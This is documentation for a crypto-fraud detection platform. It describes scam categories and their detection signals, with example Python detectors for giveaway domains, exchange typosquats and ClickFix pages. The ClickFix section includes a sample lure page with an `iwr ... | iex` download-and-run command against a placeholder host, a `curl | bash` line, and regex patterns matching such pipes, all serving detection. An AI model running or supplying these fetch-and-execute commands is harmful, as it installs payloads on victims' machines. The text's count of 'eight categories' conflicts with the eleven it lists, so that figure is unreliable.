Threat Categories
Chainara Platform classifies detected threats into the categories below. Understanding these helps investigators prioritize responses, interpret risk scores, and recognize fraud patterns in the wild.
Category Overview
| Category | Description | Common Signals |
|---|---|---|
| Giveaway Scam | Fake "double your XRP" or airdrop promotions | Keywords: giveaway, double, multiply, airdrop, free XRP |
| Exchange Phishing | Impersonates a crypto exchange login page | Domains spoofing Binance, Coinbase, Kraken, etc. |
| Wallet Phishing | Fake wallet software or seed phrase harvesting | Impersonates Xaman, Ledger, MetaMask |
| Doubling Scam | Promises to return double the XRP sent | Send-and-double mechanics, celebrity impersonation |
| Fake ICO / Presale | Fraudulent token sales or investment rounds | Presale, ICO, early investor, whitelist keywords |
| NFT Mints | Fraudulent NFT drops requesting wallet approval | Suspicious mint, claim, allowance transaction requests |
| Mining Scam | Fake cloud mining or staking platforms | Promises passive income, mining pool, staking yields |
| Tech Support Scam | Fake support channels stealing credentials or funds | Support, help desk, live chat, account recovery |
| ClickFix / Command Injection | Social-engineering pages instructing victims to paste shell commands | `iwr \| iex` / `curl \| bash` pipe patterns, fake CAPTCHA or "press Win+R" instructions |
| Recovery Scam | Promises to recover stolen crypto for an upfront fee, re-victimizing prior fraud victims | Recovery / refund / reclaim keywords, lead-gen forms with no on-page wallet |
| Pre-flagged by Browser | Site already blocked by Cloudflare Gateway, Google Safe Browsing, or the user's browser | Phishing-warning interstitial detected during scan; auto-scored HIGH |
Detection Methodology
Giveaway Scams
The most prevalent category in the XRP ecosystem. These campaigns typically:
- Impersonate Ripple, Brad Garlinghouse, or major exchanges
- Use domains like xrp-giveaway.com, ripple-airdrop.live
- Instruct victims to send XRP first to "verify their wallet"
- Operate short-lived campaigns (domain lifetime often < 7 days)
Key detection signals: financial_fraud_action_keywords rule match, celebrity name in domain, high-risk TLD (.live, .xyz, .top), domain age < 30 days.
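The four signals above can be combined into a single per-domain score. The following is an added example written for this page, not Chainara code: the keyword list, impersonated-name list, weights and HIGH/MEDIUM/LOW bands are assumptions, and the two scans at the bottom are constructed samples.

```python
"""Giveaway-scam scoring for one scanned domain, combining the four
signals listed above: action-keyword hits, impersonated name in the
domain, high-risk TLD, and domain age under 30 days. Added example
(not Chainara code); keyword lists, weights and thresholds are assumed."""
from dataclasses import dataclass, field
from datetime import date
from typing import List, Optional

# Keyword set taken from the category table; a real rule would be broader.
FRAUD_ACTION_KEYWORDS = ("giveaway", "double", "multiply", "airdrop", "free xrp")
# Names the section lists as commonly impersonated (assumed list).
IMPERSONATED_NAMES = ("ripple", "garlinghouse", "binance", "coinbase", "kraken")
HIGH_RISK_TLDS = ("live", "xyz", "top")
YOUNG_DOMAIN_DAYS = 30


@dataclass
class Scan:
    domain: str
    page_text: str
    scan_date: date
    registered: Optional[date]  # None when the WHOIS/RDAP lookup failed


@dataclass
class Verdict:
    score: int = 0
    signals: List[str] = field(default_factory=list)

    @property
    def level(self) -> str:
        # Assumed bands; the platform's own thresholds are not on the page.
        if self.score >= 6:
            return "HIGH"
        if self.score >= 3:
            return "MEDIUM"
        return "LOW"


def score_giveaway(scan: Scan) -> Verdict:
    v = Verdict()
    text = scan.page_text.lower()
    labels = scan.domain.lower().rstrip(".").split(".")
    host, tld = "-".join(labels[:-1]), labels[-1]

    # Signal 1: financial-fraud action keywords; two or more hits weigh more.
    hits = [k for k in FRAUD_ACTION_KEYWORDS if k in text]
    if hits:
        v.score += 3 if len(hits) >= 2 else 1
        v.signals.append("financial_fraud_action_keywords: " + ", ".join(hits))

    # Signal 2: impersonated person/brand name inside the domain (not the TLD).
    names = [n for n in IMPERSONATED_NAMES if n in host]
    if names:
        v.score += 2
        v.signals.append("impersonated_name_in_domain: " + ", ".join(names))

    # Signal 3: high-risk TLD.
    if tld in HIGH_RISK_TLDS:
        v.score += 1
        v.signals.append(f"high_risk_tld: .{tld}")

    # Signal 4: domain age; an unknown age is itself mildly suspicious.
    if scan.registered is None:
        v.score += 1
        v.signals.append("domain_age_unknown")
    else:
        age = (scan.scan_date - scan.registered).days
        if age < YOUNG_DOMAIN_DAYS:
            v.score += 2
            v.signals.append(f"domain_age_days: {age}")
    return v


# Constructed sample scans (page text and dates are illustrative, not findings).
SUSPECT = Scan("ripple-airdrop.live",
               "Official Ripple giveaway! Send 1,000 XRP and we double it. Free XRP airdrop.",
               date(2024, 6, 10), date(2024, 6, 5))
BENIGN = Scan("xrp-docs.example", "Documentation for the XRP Ledger.",
              date(2024, 6, 10), date(2013, 1, 1))

if __name__ == "__main__":
    for s in (SUSPECT, BENIGN):
        v = score_giveaway(s)
        print(s.domain, v.level, v.score, v.signals)
```

Keeping every contributing signal in `Verdict.signals` is what lets an investigator see why a domain scored HIGH rather than trusting the number alone, and it is also where a false-positive review starts (a legitimate new site on a .live domain will show exactly which rules fired).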
Exchange Phishing
Cloned exchange login pages designed to steal credentials and 2FA codes. Common attack vectors:
- Typosquatted domains (e.g. binnance.com, coinbaise.com)
- Punycode homoglyph attacks
- Phishing links distributed via Discord/Telegram/Twitter DMs
Key detection signals: High Levenshtein similarity to known exchange brands, login form detected in HTTP analysis, suspicious redirect chains.
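Brand similarity and punycode homoglyphs can be checked together, because a homoglyph domain only becomes obvious once its `xn--` label is decoded and look-alike letters are folded back to Latin. The code below is an added example, not part of the Platform; the brand list, the (deliberately small) confusable table, the edit-distance threshold and the sample hostnames are assumptions, and the homoglyph sample is built in the code from a Cyrillic "о".

```python
"""Exchange-brand impersonation check for a hostname: decodes punycode
labels, folds a few Cyrillic/Latin confusables, and measures Levenshtein
distance to a known-brand list. Added example (not Chainara code); the
brand list, confusable table and distance threshold are assumptions."""
from typing import Dict, Tuple

KNOWN_BRANDS = ("binance", "coinbase", "kraken", "bitstamp")
# Simplified confusable table: Cyrillic letters whose glyphs match Latin ones.
# A production check would use the full Unicode confusables data.
CONFUSABLES: Dict[str, str] = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u0456": "i",
}
MAX_EDIT_DISTANCE = 2


def levenshtein(a: str, b: str) -> int:
    """Classic dynamic-programming edit distance (insert/delete/substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def decode_label(label: str) -> Tuple[str, bool]:
    """Return the Unicode form of a DNS label and whether it was punycode."""
    if label.lower().startswith("xn--"):
        try:
            return label.encode("ascii").decode("idna"), True
        except UnicodeError:
            return label, True  # malformed punycode: keep raw label, still flag it
    return label, False


def fold_confusables(s: str) -> str:
    return "".join(CONFUSABLES.get(ch, ch) for ch in s)


def check_host(hostname: str) -> dict:
    labels = hostname.lower().rstrip(".").split(".")
    # Naive registrable-label pick (second-level label); a real scanner would
    # consult the public suffix list so "co.uk"-style suffixes are handled.
    label = labels[-2] if len(labels) >= 2 else labels[0]
    unicode_label, was_punycode = decode_label(label)
    folded = fold_confusables(unicode_label)
    distance, brand = min((levenshtein(folded, b), b) for b in KNOWN_BRANDS)
    # Exact brand match only after decoding/folding means look-alike letters.
    homoglyph = distance == 0 and (was_punycode or folded != unicode_label)
    typosquat = 0 < distance <= MAX_EDIT_DISTANCE
    return {
        "label": unicode_label,
        "closest_brand": brand,
        "distance": distance,
        "punycode": was_punycode,
        "homoglyph": homoglyph,
        "typosquat": typosquat,
        "suspicious": homoglyph or typosquat,
    }


# Constructed sample: "coinbase" with a Cyrillic o, encoded to its xn-- form here.
HOMOGLYPH_HOST = "c\u043einbase".encode("idna").decode("ascii") + ".com"

if __name__ == "__main__":
    for h in ("binnance.com", "coinbaise.com", HOMOGLYPH_HOST, "www.kraken.com"):
        print(h, check_host(h))
```

Note that an exact brand match with no punycode and no folded characters is deliberately not flagged: this check only measures similarity, and whether `www.kraken.com` is the genuine exchange is a question for the brand list and certificate/ownership checks, not for edit distance.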
Wallet Phishing
Targets XRP wallet users specifically. Attack patterns include:
- Fake Xaman (XUMM) wallet download pages
- Seed phrase "recovery" forms
- Browser extension impersonation
The xaman_wallet_phishing rule in the Platform rule engine specifically targets this category. New wallet applications should be added to the monitored brand list as they gain adoption.
Key detection signals: xaman_wallet_phishing rule, App Store / Google Play impersonation patterns, "enter seed phrase" content detected.
Doubling Scams
A variant of giveaway scams. Victims are shown a transaction history in which others appear to receive doubled XRP, then are prompted to send funds. These are often:
- Run by automated bots on Twitter/YouTube
- Backed by Intel personas who interact with victims
Key detection signals: Round-number transaction amounts, round_amount wallet signal, rapid transaction frequency (rapid_tx), victim reports linking multiple wallets.
Fake ICO / Presale
Fraudulent fundraising campaigns selling non-existent tokens. Common in bull markets:
- White paper plagiarism
- Fake team member profiles
- Presale smart contracts designed to steal funds
Key detection signals: Presale/ICO keywords, newly registered domain, payment wallet linked to other fraud reports.
NFT Mints
Fraudulent NFT drop campaigns that trick users into approving malicious wallet transactions:
- Fake "free mint" pages that drain wallets via approval transactions
- Discord server compromises distributing phishing links
- Impersonation of legitimate NFT projects
Key detection signals: NFT/mint keywords, suspicious transaction approval requests, Intel platform Discord monitoring.
Mining Scams
Platforms claiming to offer cloud mining or passive staking returns that are either Ponzi schemes or outright theft:
- Often show fake "earnings dashboards"
- Require an initial deposit that cannot be withdrawn
- Use referral schemes to recruit more victims
Key detection signals: Mining/staking keywords, payment wallets showing consistent inbound-only flow, no legitimate blockchain mining activity.
Tech Support Scams
Fake customer support operations targeting crypto users:
- Impersonates exchange or wallet support teams
- Operates via Telegram, Discord, or email
- Requests remote access, seed phrases, or "verification transactions"
Key detection signals: Support/helpdesk keywords, Intel persona conversations capturing support scam scripts, domain impersonating exchange support subdomains.
ClickFix / Command Injection
Social-engineering attacks where the malicious site instructs the victim to copy a shell command and run it locally, disguised as a legitimate "node setup", "wallet verification", or "captcha fix" step. Once executed, the command typically downloads and runs a wallet drainer or info-stealer:
- PowerShell payloads (`iwr ... | iex`)
- Bash one-liners (`curl ... | bash`)
- Fake CAPTCHA / human verification pages with copy-paste instructions
Key detection signals: Shell-pipe pattern in page content (iwr | iex, curl | bash), fake "press Win+R" or terminal instructions, command-injection rule match in browser worker scans.
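A content-side detector for this category has to look at both halves of the lure: the shell-pipe command itself and the instructions telling the victim where to paste it. The code below is an added example for this page, not the Platform's browser-worker rule; the regexes, severity bands and the three sample pages are constructed, and `example.invalid` is a placeholder host.

```python
"""ClickFix / paste-a-command detection over scanned page content, using the
shell-pipe patterns and "press Win+R" style instructions listed above. Added
example (not Chainara code); the regexes and sample pages are constructed."""
import html
import re
from typing import Dict, List

PIPE_PATTERNS = [
    # PowerShell download-and-execute: iwr/Invoke-WebRequest piped into iex.
    ("powershell_iwr_iex", re.compile(
        r"\b(?:iwr|invoke-webrequest)\b[^|\n]{0,200}\|\s*(?:iex|invoke-expression)\b", re.I)),
    # Bash one-liner: curl/wget piped into a shell.
    ("curl_pipe_shell", re.compile(
        r"\b(?:curl|wget)\b[^|\n]{0,200}\|\s*(?:sudo\s+)?(?:ba|z)?sh\b", re.I)),
]
INSTRUCTION_PATTERNS = [
    ("win_r_dialog", re.compile(
        r"\b(?:press|hold|hit)\s+(?:the\s+)?win(?:dows)?\s*(?:key\s*)?\+\s*r\b", re.I)),
    ("paste_and_run", re.compile(
        r"\b(?:paste|enter)\b.{0,40}\b(?:terminal|powershell|run dialog|command prompt)\b",
        re.I | re.S)),
    ("fake_captcha", re.compile(
        r"\b(?:i am not a robot|human verification|verify you are human)\b", re.I)),
]


def visible_text(page_html: str) -> str:
    # Strip tags and decode entities so "&#124;" (an obfuscated pipe) is seen as "|".
    return html.unescape(re.sub(r"<[^>]+>", " ", page_html))


def detect_clickfix(page_html: str) -> Dict[str, object]:
    text = visible_text(page_html)
    hits: List[str] = [name for name, rx in PIPE_PATTERNS + INSTRUCTION_PATTERNS
                       if rx.search(text)]
    pipe_hit = any(name in hits for name, _ in PIPE_PATTERNS)
    instr_hit = any(name in hits for name, _ in INSTRUCTION_PATTERNS)
    # A pipe alone is ambiguous (legitimate installers also say `curl ... | bash`);
    # a pipe plus copy-paste/run-dialog instructions is the ClickFix signature.
    if pipe_hit and instr_hit:
        level = "HIGH"
    elif pipe_hit:
        level = "MEDIUM"
    elif instr_hit:
        level = "LOW"
    else:
        level = "NONE"
    return {"level": level, "signals": hits}


# Constructed sample pages (example.invalid is a placeholder, not a real host).
SAMPLE_CLICKFIX = """<h2>Human verification</h2>
<p>To verify your wallet, press Win + R, paste the command below into the
Run dialog and press Enter:</p>
<code>iwr https://example.invalid/verify.ps1 &#124; iex</code>"""
SAMPLE_DEV_DOCS = "<p>Install with: curl -fsSL https://example.invalid/install.sh | bash</p>"
SAMPLE_BENIGN = "<p>Welcome to the XRP community forum.</p>"

if __name__ == "__main__":
    for page in (SAMPLE_CLICKFIX, SAMPLE_DEV_DOCS, SAMPLE_BENIGN):
        print(detect_clickfix(page))
```

Decoding entities before matching matters: a page can hide the pipe as `&#124;` so that a naive regex over raw HTML misses it while the victim still sees (and copies) a normal `|`. The MEDIUM band for a bare `curl | bash` reflects that the same line appears in many legitimate installer READMEs, so it is escalated only when the run-dialog or fake-CAPTCHA instructions are present too.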
Recovery Scams
Targets victims who have already been defrauded, promising to recover stolen crypto for an upfront fee. These rarely have an on-page wallet. The scam is typically lead-generation that funnels victims into DMs or phone calls. Detection therefore requires higher confidence to avoid flagging legitimate recovery services:
- Recovery-themed advertising (heavily seen in Bing and LinkedIn ads)
- Lead-gen forms with no payment infrastructure visible
- "We can recover your crypto" / "Refund your investment" language
Key detection signals: Recovery / refund / reclaim keywords, advertising on platforms with high recovery-scam volume, no on-page wallet but matching ad-scanner verdict.
Pre-flagged by Browser
When a worker scans a site that's already been blocked by Cloudflare Gateway, Google Safe Browsing, or the user's browser, the worker sees the warning interstitial instead of the original page. These are auto-scored HIGH threat because a third-party security vendor has already classified the destination as malicious, even though the original content is no longer reachable.
Key detection signals: Cloudflare Gateway block page, Google Safe Browsing interstitial, browser phishing warning detected during scan.
Detection Accuracy
The Platform's detection pipeline achieves:
| Metric | Value |
|---|---|
| True Positive Rate (Sensitivity) | 94.2% |
| False Positive Rate | 2.1% |
| Average Detection Latency | < 2 seconds |
These figures are measured against a labeled historical dataset of confirmed malicious and legitimate XRP-related domains. False positives are primarily legitimate new domains with multiple risk signals (e.g. a new XRP-related site with a fresh registration and .live TLD). Manual review resolves these cases, and confirmed false positives can be whitelisted in Admin.
Category in the Fraud Report Workflow
When submitting a fraud report, investigators select one of these eight categories. The selection:
- Contributes to the domain's or wallet's classification label
- Influences future LLM analysis context
- Groups reports for aggregate threat trend analysis in the Metrics dashboard
See Fraud Intelligence for the full report submission workflow.